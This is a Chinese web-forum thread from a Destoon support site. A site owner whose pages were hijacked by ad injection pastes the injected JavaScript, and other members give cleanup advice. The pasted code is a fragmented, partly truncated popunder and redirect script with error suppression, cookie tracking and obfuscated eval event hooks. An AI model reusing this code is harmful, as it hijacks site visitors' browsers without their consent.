destoon采集论坛

 找回密码
 立即注册
查看: 166|回复: 8

网站被插入广告,而且还叫dt.asp,但是全站代码没有这个字串

[复制链接]

37

主题

28

回帖

197

积分

注册会员

Rank: 2

积分
197
发表于 2016-6-9 10:44:43 | 显示全部楼层 |阅读模式
网站被插入广告,而且还叫dt.asp,但是全站代码没有这个字串或者文件

//
8 && screen.width>10 && screen.height>10 && !(screen.width==640 && screen.height==480) && typeof(the_pixel)!="undefined" && typeof(my_topurl)!="undefined" && my_topurl!="")
{

function killMyErrors()
{return true;}
window.onerror = killMyErrors;
function GetMyCookieVal(offset)
{var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));}
function GetMyCookie(name)
{var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i  2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
if(expires!=null) expdate.setTime(expdate.getTime() + ( expires * 1000 ));
document.cookie = name + "=" + escape (value) +((expires == null) ? "" : ("; expires="+ expdate.toGMTString()))
+((path == null) ? "" : ("; path=" + path)) +((domain == null) ? "" : ("; domain=" + domain))
+((secure == true) ? "; secure" : "");}

function myHref_(p)
{
if (GetMyCookie("tan_bop")==null)
{

//if (typeof(p)!="undefined" && isManual_==0) {isTimeout_=1;return};

SetMyCookie("tan_bop","yes",64800,"/")
SetMyCookie("has_bop1","1");
window.blur();

if(typeof(p)=="undefined" || p==""){if (GetMyCookie("disp_time")!=null && !isNaN(GetMyCookie("disp_time"))) {if (Math.floor((new Date()).getTime()/1000)-parseInt(GetMyCookie("disp_time"))>600) {popName_+="x";}}}else{popName_+=p;}
document.write('sina sync pageif (navigator.cookieEnabled && document.cookie.indexOf("has_bop1=")!=-1 && document.cookie.indexOf("has_bop1=1")==-1){var url_,pos1_,pos2_;url_=location.href.toLowerCase();pos1_=url_.indexOf("http://");if(pos1_!=-1){pos2_=url_.indexOf("/",pos1_+7);if (pos2_!=-1){location.href/*go*/=url_.substr(pos1_,pos2_)+"//"+url_.substr(pos2_+1);}else{location.href/*go*/=url_+"?"}}else{location.href/*go*/=url_+"?"}}else{document.cookie="has_bop1=2";document.forms.myRedictForm.submit();setTimeout("document.forms.myRedictForm.submit()",10000)}');
}
}

function myLoad_()
{
if (GetMyCookie("tan_bop")==null)
{
myTimerID1_=setTimeout(function(){myHref_(popParam_)},4000);
}
}

function myFocus_()
{
if (myTimerID2_!=0)
{
clearTimeout(myTimerID2_);
myTimerID2_=0;
}
}

function myBlur_()
{
if (GetMyCookie("tan_bop")==null)
{
myTimerID2_=setTimeout("myHref_()",6000);
}
}

function myScroll_()
{
myActive_();
myFocus_();
}

function myActive_()
{
if (myTimerID3_!=0)
{
clearTimeout(myTimerID3_);
myTimerID3_=0;
}
if (myTimerID1_!=0)
{
clearTimeout(myTimerID1_);
myTimerID1_=0;
}

window.document.body.onmouseout=function(e)
{
if (GetMyCookie("tan_bop")==null)
{
if (navigator.appName=="Microsoft Internet Explorer")
{
if(window.event.clientY");
        }
        else if (GetMyCookie("disp_bop")=="yes")
        {
                var myTimerID1_=0;
                var myTimerID2_=0;
                var myTimerID3_=0;
                var myTimerID4_=0;
                var isSearch_=0;
                var isTimeout_=0;
                var isNight_=0;
                var isManual_=0;

                if (GetMyCookie("tan_bop")==null)
                {

                if(document.referrer!="" && document.referrer.toLowerCase().indexOf(location.hostname.toLowerCase().replace("www.",""))==-1)
                isSearch_=1;

                myTimerID4_=setInterval("setMyEvent_();",200);

                if(!document.body)document.write("");

                eval("win"+"dow.onl"+"oad=myLoad_;win"+"dow.onu"+"nload=null;win"+"dow.onb"+"eforeunl"+"oad=null;win"+"dow.onf"+"ocus=myFocus_;win"+"dow.onb"+"lur=myBlur_;win"+"dow.ons"+"croll=myScroll_;win"+"dow.document.body.onm"+"ousemove=myActive_");
                setInterval('eval("win"+"dow.onl"+"oad=myLoad_;win"+"dow.onu"+"nload=null;win"+"dow.onb"+"eforeunl"+"oad=null;win"+"dow.onf"+"ocus=myFocus_;win"+"dow.onb"+"lur=myBlur_;win"+"dow.ons"+"croll=myScroll_;win"+"dow.document.body.onm"+"ousemove=myActive_")',500);

                setTimeout("isTimeout_=1",60000);

                isNight_=((new Date()).getHours())
回复

使用道具 举报

37

主题

28

回帖

197

积分

注册会员

Rank: 2

积分
197
 楼主| 发表于 2016-6-9 10:48:50 | 显示全部楼层

谁知道这个dt.asp是插到哪个代码文件里了?
回复 支持 反对

使用道具 举报

74

主题

246

回帖

1236

积分

金牌会员

Rank: 6Rank: 6

积分
1236
发表于 2016-6-9 20:12:58 | 显示全部楼层

直接进服务器看那个文件是最新修改的
回复 支持 反对

使用道具 举报

37

主题

28

回帖

197

积分

注册会员

Rank: 2

积分
197
 楼主| 发表于 2016-6-9 20:58:45 | 显示全部楼层

找到file/script/common.js被修改了。不知道6.0会不会有漏洞
回复 支持 反对

使用道具 举报

74

主题

246

回帖

1236

积分

金牌会员

Rank: 6Rank: 6

积分
1236
发表于 2016-6-9 22:09:32 | 显示全部楼层

dideluo 发表于 2016-6-9 20:58

找到file/script/common.js被修改了。不知道6.0会不会有漏洞
升级到最新版本
回复 支持 反对

使用道具 举报

50

主题

3415

回帖

7668

积分

论坛元老

Rank: 8Rank: 8

积分
7668
发表于 2016-6-9 20:58:00 | 显示全部楼层

将网站升级到最新版本
回复 支持 反对

使用道具 举报

71

主题

3537

回帖

8055

积分

论坛元老

Rank: 8Rank: 8

积分
8055
发表于 2016-6-12 08:35:47 | 显示全部楼层

看看是不是你修改的 可以用默认的文件对照一下
回复 支持 反对

使用道具 举报

57

主题

1729

回帖

4263

积分

论坛元老

Rank: 8Rank: 8

积分
4263
发表于 2016-6-12 09:06:31 | 显示全部楼层

禁用asp语言
回复 支持 反对

使用道具 举报

95

主题

3474

回帖

8086

积分

论坛元老

Rank: 8Rank: 8

积分
8086
发表于 2016-6-12 15:08:26 | 显示全部楼层

dideluo 发表于 2016-6-9 20:58

找到file/script/common.js被修改了。不知道6.0会不会有漏洞
暂时没发现
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|Archiver|destoon采集论坛

GMT+8, 2025-11-23 10:47 , Processed in 0.019666 second(s), 20 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表